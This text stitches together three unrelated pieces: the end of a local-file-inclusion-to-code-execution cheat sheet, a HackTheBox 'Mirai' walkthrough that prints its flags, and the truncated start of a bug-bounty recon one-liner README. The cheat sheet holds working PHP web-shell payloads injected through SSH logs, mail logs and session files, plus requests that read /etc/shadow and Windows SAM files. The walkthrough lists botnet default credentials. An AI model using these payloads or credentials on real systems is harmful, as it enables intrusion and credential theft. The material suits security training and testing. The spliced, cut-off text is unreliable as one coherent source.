http://example.com/index.php?page=/var/log/mail http://example.com/index.php?page=/var/log/httpd/error_log http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log ``` ### RCE via SSH Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`. ```powershell ssh <?php system($_GET["cmd"]);?>@10.10.10.10 ``` Then include the SSH log files inside the Web Application. ```powershell http://example.com/index.php?page=/var/log/auth.log&cmd=id ``` ### RCE via Mail First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. ```powershell root@kali:~# telnet 10.10.10.10. 25 Trying 10.10.10.10.... Connected to 10.10.10.10.. Escape character is '^]'. 220 straylight ESMTP Postfix (Debian/GNU) helo ok 250 straylight mail from: [email protected] 250 2.1.0 Ok rcpt to: root 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> subject: <?php echo system($_GET["cmd"]); ?> data2 . ``` In some cases you can also send the email with the `mail` command line. ```powershell mail -s "<?php system($_GET['cmd']);?>" [email protected]. < /dev/null ``` ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID) ```javascript Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly ``` In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/session/sess_[PHPSESSID] files ```javascript /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin"; ``` Set the cookie to `<?php system('cat /etc/passwd');?>` ```powershell login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php ``` Use the LFI to include the PHP session file ```powershell login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 ``` ## LFI to RCE via credentials files This method require high privileges inside the application in order to read the sensitive files. ### Windows version First extract `sam` and `system` files. ```powershell http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam http://example.com/index.php?page=../../../../../../WINDOWS/repair/system ``` Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique. ### Linux version First extract `/etc/shadow` files. ```powershell http://example.com/index.php?page=../../../../../../etc/shadow ``` Then crack the hashes inside in order to login via SSH on the machine. ## References * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) * [Turning LFI to RFI](https://l.avala.mp/?p=241) * [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html) * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html) * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) * [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) * [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379) * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
# [09 - Mirai](https://app.hackthebox.com/machines/Mirai) * [description](#description) * [walkthrough](#walkthrough) * [recon](#recon) * [80](#80) * [53](#53) * [back to 80](#back-to-80) * [32400](#32400) * [still digging](#still-digging) * [pi](#pi) * [flag](#flag) ![Mirai.png](Mirai.png) ## description > 10.10.10.48 ## walkthrough ### recon ``` $ nmap -sC -sV -A -Pn -p- mirai.htb Starting Nmap 7.80 ( https://nmap.org ) at 2022-07-27 16:36 MDT Nmap scan report for mirai.htb (10.10.10.48) Host is up (0.060s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA) | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA) | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA) |_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519) 53/tcp open domain dnsmasq 2.76 | dns-nsid: |_ bind.version: dnsmasq-2.76 80/tcp open http lighttpd 1.4.35 |_http-server-header: lighttpd/1.4.35 |_http-title: Website Blocked 1404/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) 32400/tcp open http Plex Media Server httpd | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-cors: HEAD GET POST PUT DELETE OPTIONS |_http-title: Unauthorized 32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### 80 waiting for nmap, looking at 80 ``` Website Blocked Access to the following site has been blocked: mirai.htb If you have an ongoing use for this website, please ask the owner of the Pi-hole in your network to have it whitelisted. This page is blocked because it is explicitly contained within the following block list(s): Go back Whitelist this page Close window Generated Wed 10:36 PM, Jul 27 by Pi-hole v3.1.4 ``` oh that's interesting.. we're going to have to come back to this ### 53 presumably dnsenum / zone transfer? ``` $ dnsenum --dnsserver mirai.htb --enum mirai.htb -r dnsenum VERSION:1.2.6 ----- mirai.htb ----- Host's addresses: __________________ Name Servers: ______________ mirai.htb NS record query failed: query timed out ``` ``` $ dig axfr mirai.htb @10.10.10.48 ; <<>> DiG 9.16.8-Ubuntu <<>> axfr mirai.htb @10.10.10.48 ;; global options: +cmd ;; connection timed out; no servers could be reached ``` that's.. not expected. and a straight `nc` command does connect. ### back to 80 watching traffic through burp, see `/admin/scripts/...` calls hitting `/admin/` itself brings us to the pi-hole dashboard there are no default credentials, so exploit? ``` msf6 > search pi-hole Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/http/pihole_dhcp_mac_exec 2020-03-28 good Yes Pi-Hole DHCP MAC OS Command Execution 1 exploit/linux/local/pihole_remove_commands_lpe 2021-04-20 great Yes Pi-Hole Remove Commands Linux Priv Esc 2 auxiliary/admin/http/pihole_domains_api_exec 2021-08-04 normal Yes Pi-Hole Top Domains API Authenticated Exec 3 exploit/unix/http/pihole_whitelist_exec 2018-04-15 excellent Yes Pi-Hole Whitelist OS Command Execution 4 exploit/unix/http/pihole_blocklist_exec 2020-05-10 excellent Yes Pi-Hole heisenbergCompensator Blocklist OS Command Execution ``` that looks like a path, but all fail with BAD PASSWORD ### 32400 plex that has a login at [http://mirai.htb:32400/web/index.html](http://mirai.htb:32400/web/index.html) but it also allows "Sign Up" - but any name sent leads to "Username already taken", which is not accurate. or is it? the POST goes to `https://plex.tv/api/v2/users?X-Plex-Product=Plex Web&X-Plex-Version=3.9.1&X-Plex-Client-Identifier=016n0fqinkcga84rwinvudhl&X-Plex-Platform=Firefox&X-Plex-Platform-Version=101.0&X-Plex-Device=Linux&X-Plex-Device-Name=Plex Web (Firefox)&X-Plex-Device-Screen-Resolution=1908x969,3840x2160` ### still digging dnsmasq 2.76: ``` ------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference | windows/dos/9617.txt Dnsmasq < 2.78 - 2-byte Heap Overflow | multiple/dos/42941.py Dnsmasq < 2.78 - Heap Overflow | multiple/dos/42942.py Dnsmasq < 2.78 - Information Leak | multiple/dos/42944.py Dnsmasq < 2.78 - Integer Underflow | multiple/dos/42946.py Dnsmasq < 2.78 - Lack of free() Denial of Service | multiple/dos/42945.py Dnsmasq < 2.78 - Stack Overflow | multiple/dos/42943.py dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) | linux/dos/48301.py Web Interface for DNSmasq / Mikrotik - SQL Injection | php/webapps/39817.php ------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results ``` so we're vulnerable to all but the first and last 2, but they are DoS, not RCE/file access lighttpd 1.4.35 ``` ------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- lighttpd - Denial of Service (PoC) | linux/dos/18295.txt Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities | windows/remote/30322.rb Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution | multiple/remote/4391.c Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution | linux/remote/4437.c lighttpd 1.4.31 - Denial of Service (PoC) | linux/dos/22902.sh Lighttpd 1.4.x - mod_userdir Information Disclosure | linux/remote/31396.txt lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service | linux/dos/33591.sh Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure | multiple/remote/8786.txt ------------------------------------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results ``` no direct hits Platinum upnp 1.0.5.13 how did mirai actually work - weak credentials.. on ssh. ``` $ cat ~/git/ctf/tools/wordlists/SecLists/Passwords/Malware/mirai-botnet.txt root xc3511 root vizxv root admin admin admin root 888888 root xmhdipc root default root jauntech root 123456 root 54321 support support root (none) admin password root root root 12345 user user admin (none) root pass admin admin1234 root 1111 admin smcadmin admin 1111 root 666666 root password root 1234 root klv123 Administrator admin service service supervisor supervisor guest guest guest 12345 admin1 password administrator 1234 666666 666666 888888 888888 ubnt ubnt root klv1234 root Zte521 root hi3518 root jvbzd root anko root zlxx. root 7ujMko0vizxv root 7ujMko0admin root system root ikwb root dreambox root user root realtek root 000000 admin 1111111 admin 1234 admin 12345 admin 54321 admin 123456 admin 7ujMko0admin admin pass admin meinsm tech tech mother fucker ``` was going down the path of creating password and username lists, when noticed the msf option ``` USERPASS_FILE no File containing users and passwords separated by space, one pair per line ``` yeah this is the way. ``` msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS mirai.htb RHOSTS => mirai.htb msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/conor/git/ctf/tools/wordlists/SecLists/Passwords/Malware/mirai-botnet.txt USERPASS_FILE => /home/conor/git/ctf/tools/wordlists/SecLists/Passwords/Malware/mirai-botnet.txt msf6 auxiliary(scanner/ssh/ssh_login) > run [*] 10.10.10.48:22 - Starting bruteforce [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/ssh/ssh_login) > ``` hrmm.. or not ``` $ ssh -l pi mirai.htb Warning: Permanently added 'mirai.htb,10.10.10.48' (ECDSA) to the list of known hosts. [email protected]'s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Aug 27 14:47:50 2017 from localhost SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. pi@raspberrypi:~ $ ``` `pi:raspberry`, which actually showed up on the initial search for default creds.. oi ### pi ``` pi@raspberrypi:~ $ ls -la total 1509 drwxr-xr-x 21 pi pi 4096 Jul 29 20:29 . drwxr-xr-x 4 root root 4096 Aug 13 2017 .. -rw------- 1 pi pi 56 Jul 29 20:29 .Xauthority -rw-r--r-- 1 pi pi 69 Aug 13 2017 .asoundrc -rw------- 1 pi pi 18 Dec 24 2017 .bash_history -rw-r--r-- 1 pi pi 220 Nov 12 2014 .bash_logout -rw-r--r-- 1 pi pi 3512 Oct 24 2016 .bashrc drwxr-xr-x 6 pi pi 4096 Aug 13 2017 .cache drwx------ 15 pi pi 4096 Aug 13 2017 .config drwx------ 3 pi pi 4096 Aug 13 2017 .dbus drwxr-xr-x 2 pi pi 4096 Aug 13 2017 .gstreamer-0.10 -rw-r--r-- 1 pi pi 26 Aug 13 2017 .gtkrc-2.0 drwxr-xr-x 4 pi pi 4096 Aug 13 2017 .local drwx------ 3 pi pi 4096 Aug 13 2017 .pki -rw-r--r-- 1 pi pi 675 Nov 12 2014 .profile drwxr-xr-x 3 pi pi 4096 Aug 13 2017 .themes drwx------ 4 pi pi 4096 Aug 13 2017 .thumbnails -rw------- 1 pi pi 711 Jul 29 20:30 .xsession-errors -rw------- 1 pi pi 711 Dec 24 2017 .xsession-errors.old drwxr-xr-x 3 pi pi 4096 Aug 13 2017 Desktop drwxr-xr-x 5 pi pi 99 Dec 13 2016 Documents drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Downloads drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Music drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Pictures drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Public drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Templates drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Videos -rw-r--r-- 1 pi pi 1441764 Aug 13 2017 background.jpg drwxr-xr-x 3 pi pi 4096 Aug 13 2017 oldconffiles drwxr-xr-x 2 pi pi 1629 Dec 13 2016 python_games pi@raspberrypi:~ $ find . -iname user.txt ./Desktop/user.txt pi@raspberrypi:~ $ cat Desktop/user.txt ff837707441b257a20e32199d7c8838d ``` user down. ``` pi@raspberrypi:~ $ tree -a oldconffiles/ oldconffiles/ └── .config ├── openbox │   └── lxde-pi-rc.xml └── pcmanfm └── LXDE-pi └── desktop-items-0.conf 4 directories, 2 files ``` but nothing popping ``` pi@raspberrypi:~ $ sudo -l Matching Defaults entries for pi on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User pi may run the following commands on localhost: (ALL : ALL) ALL (ALL) NOPASSWD: ALL ``` oh. ``` pi@raspberrypi:~ $ sudo cat /root/root.txt I lost my original root.txt! I think I may have a backup on my USB stick... ``` ok, that is a deviation.. ``` pi@raspberrypi:~ $ ls -la /media/usbstick/ total 18 drwxr-xr-x 3 root root 1024 Aug 14 2017 . drwxr-xr-x 3 root root 4096 Aug 14 2017 .. -rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt drwx------ 2 root root 12288 Aug 14 2017 lost+found pi@raspberrypi:~ $ cat /media/usbstick/damnit.txt Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James ``` ``` ╔══════════╣ Modified interesting files in the last 5mins (limit 100) /usr/share/gdb/python/gdb/command/type_printers.pyc /usr/share/gdb/python/gdb/command/prompt.pyc /usr/share/gdb/python/gdb/command/__init__.pyc /usr/share/gdb/python/gdb/command/bound_registers.pyc /usr/share/gdb/python/gdb/command/pretty_printers.pyc /usr/share/gdb/python/gdb/command/explore.pyc /usr/share/gdb/python/gdb/command/frame_filters.pyc /usr/share/gdb/python/gdb/prompt.pyc /usr/share/gdb/python/gdb/printing.pyc /usr/share/gdb/python/gdb/frames.pyc /usr/share/gdb/python/gdb/__init__.pyc /usr/share/gdb/python/gdb/FrameDecorator.pyc /usr/share/gdb/python/gdb/types.pyc /usr/share/gdb/python/gdb/FrameIterator.pyc /usr/share/gdb/python/gdb/function/strfns.pyc /usr/share/gdb/python/gdb/function/__init__.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/command/type_printers.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/command/prompt.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/command/__init__.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/command/bound_registers.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/command/pretty_printers.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/command/explore.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/command/frame_filters.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/prompt.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/printing.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/frames.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/__init__.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/FrameDecorator.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/types.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/FrameIterator.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/function/strfns.pyc /lib/live/mount/persistence/sda2/usr/share/gdb/python/gdb/function/__init__.pyc /lib/live/mount/persistence/sda2/etc/pihole/pihole-FTL.db /lib/live/mount/persistence/sda2/var/log/syslog /lib/live/mount/persistence/sda2/var/log/pihole.log /lib/live/mount/persistence/sda2/var/log/daemon.log /lib/live/mount/persistence/sda2/var/log/auth.log /lib/live/mount/persistence/sda2/var/log/kern.log /lib/live/mount/persistence/sda2/var/log/messages /lib/live/mount/persistence/sda2/var/lib/plexmediaserver/Library/Application Support/Plex Media Server/Logs/Plex Media Server.log /lib/live/mount/persistence/sda2/root/.gnupg/gpg.conf /lib/live/mount/persistence/sda2/root/.gnupg/pubring.gpg /lib/live/mount/persistence/sda2/root/.gnupg/trustdb.gpg /etc/pihole/pihole-FTL.db /var/log/syslog /var/log/pihole.log /var/log/daemon.log /var/log/auth.log /var/log/kern.log /var/log/messages /root/.gnupg/gpg.conf /root/.gnupg/pubring.gpg /root/.gnupg/trustdb.gpg ``` those are interesting files.. but not following the 'recover deleted file' path following [https://www.cyberciti.biz/tips/linux-ext3-ext4-deleted-files-recovery-howto.html](https://www.cyberciti.biz/tips/linux-ext3-ext4-deleted-files-recovery-howto.html) ``` root@raspberrypi:~# mount sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755) /dev/sda1 on /lib/live/mount/persistence/sda1 type iso9660 (ro,noatime) /dev/loop0 on /lib/live/mount/rootfs/filesystem.squashfs type squashfs (ro,noatime) tmpfs on /lib/live/mount/overlay type tmpfs (rw,relatime) /dev/sda2 on /lib/live/mount/persistence/sda2 type ext4 (rw,noatime,data=ordered) aufs on / type aufs (rw,noatime,si=a36c382a,noxino) devtmpfs on /dev type devtmpfs (rw,nosuid,size=10240k,nr_inodes=58955,mode=755) securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000) tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k) tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755) cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd) pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime) cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset) cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct) cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices) cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer) cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio) cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio) cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event) systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct) hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime) debugfs on /sys/kernel/debug type debugfs (rw,relatime) mqueue on /dev/mqueue type mqueue (rw,relatime) tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime) /dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered) tmpfs on /run/user/999 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=999,gid=997) tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=1000,gid=1000) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime) root@raspberrypi:~# debugfs -w /dev/sdb debugfs 1.42.12 (29-Aug-2014) ... ``` but `lsdel` reports no deleted files.. however, in linux, "everything is a file", so: ``` root@raspberrypi:~# strings -n 10 /dev/sdb /media/usbstick lost+found damnit.txt /media/usbstick lost+found damnit.txt /media/usbstick lost+found damnit.txt 3d3e483143ff12ec505d026fa13e020b Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? ``` and indeed, that is the root flag. one of the more interesting, if basic-when-you-know-what-you're-looking-for machines played recently. ## flag ``` user:ff837707441b257a20e32199d7c8838d root:3d3e483143ff12ec505d026fa13e020b ```
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑 ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) <div> <a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a> <a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a> </div> ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) - [@wellpunk](https://twitter.com/wellpunk) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Axiom](https://github.com/pry0cc/axiom) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Haklistgen](https://github.com/hakluke/haklistgen) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/hiddengearz/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Notify](https://github.com/projectdiscovery/notify) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [GetJS](https://github.com/003random/getJS) - [X8](https://github.com/Sh1Yo/x8) - [Unfurl](https://github.com/tomnomnom/unfurl) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### .bashrc shortcut OFJAAAH ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Oneliner Haklistgen - @hakluke ```bash subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; ``` ### Running JavaScript on each page send to proxy. - [Explained command](https://bit.ly/3daIyFw) ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/3nnEhCj) ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/324Sr1x) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command](https://bit.ly/3w48wl8) ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command](https://bit.ly/339CN5p) ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command](https://bit.ly/3d0VcY5) ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command](https://bit.ly/3m5ft1g) ```bash xargs -a domain -I@ sh -c 